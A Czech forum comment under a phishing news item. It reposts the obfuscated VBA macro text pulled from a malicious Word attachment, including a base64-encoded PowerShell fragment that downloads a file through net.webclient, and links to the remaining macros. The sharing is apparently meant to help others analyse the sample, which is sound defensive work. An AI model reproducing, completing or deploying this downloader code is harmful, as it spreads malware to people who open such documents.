Přidat aktualitu mezi oblíbenéZasílat nové komentáře e-mailem Phishingových útoků pomocí mailů přibývá

Staré doc, i novější docx nebo docm jsou zip soubory. V jakém formátu a specifikaci to tam je uložené netuším, nezajímal jsem se o to, ale nějak by i z těch souborů nejspíš mělo jít přímo vycucnout ty makra. V těch starých doc je to po rozbalení ve složce Macros.
Včera jsem ukládal ten text maker přímo z wordu, v tom doc je jich tam myslím 12, text toho prvního je:

Function qriswicitfomawa()
ibzwyrwvclbo = "6a756868696e6e776c6a6d65696c70" & "6678656e796e637975696668716e7a" & "6b6d68766862726b726c6666"
vjuxs = Array(9693, 6284, 4127, 2911, 9563, 3146, 6670, 497, 7922, 2433, 75, 2148, 8259, 9609, 2287, 8757, 3086, 8106, 970)
rzzgpmd = 850916944
drihbqbutnbdqh
End Function
Function onbzfjjbqtsjpa(eelhbgecanqzg As String)
tmaqwsigcghrrykwyaemhl = True
sykykvlmtwgjhuoawzbr = 21154
eelhbgecanqzg = "APQAiAHgAdgBtAHEAegBhAGMAcwBiAHgAbwBkAGEAbwB6ACIAOwAKACQAbgBlAHIAbgB4AHAAdwA9ACYAKAAiAG4AZQB3AC0AbwBiAGoAZQBjAHQAIgApACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AAoAJABuAGgAZAByAHUAdgBtAGsAZQBvAGIAYgB3AHIAPQAiAHQAbQBrAHQAYQAiADsACgAkAG4AZQByAG4AeABwAHcALgAiAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACIAKAAkAGwAYQB0AHIAcgBqAHoALAAgACQAdwB4AHgAdwBzAHkAaQApADsACgAkAHYAZQB2AHkAagBlAHkAdQBzAGEAaAB3AHkAPQAiAGEAZABrAGUAYwBoAG4AYgB0AHoAIgA7AAoASQBmACAAKAAoAC4AKAAiAEcAZQB0AC0ASQB0AGUAbQAiACkAIAAkAHcAeAB4AHcAcwB5AGkAKQAuACIAbABlAG4AZwB0AGgAIgAgAC0AZwBlACAAMQA1ADcAMw"
onbzfjjbqtsjpa = eelhbgecanqzg
iepwmrhgfacsnlohi = Array(9227, 7826, 9298, 863, 8096, 4252, 5145, 4469, 6798, 8997, 1016, 9270, 3679, 1040, 3025, 2845, 8773, 1314)
End Function 

Nevlezou se tu všechny, všechny jsou tu:
https://uloz.to/file/DIJRXlGPvqH8/sprava-doc-txt
je to normální neškodný textový soubor a je možné že jej i tak budou detekovat nějaké antiviry. A mezi jednotlivými makry jsou volné 3 řádky.
Jestli chceš ještě něco jinýho tak napiš odkud to mám zkopírovat :-)
Jo a jestli chceš vysvětlit co v těch makrech je, tak to fakt netuším, VBA nějak neovladám :-)

Reakce na komentář

1 Zadajte svou přezdívku:
2 Napište svůj komentář:
3 Pokud chcete dostat ban, zadejte libovolný text:

Zpět na aktuality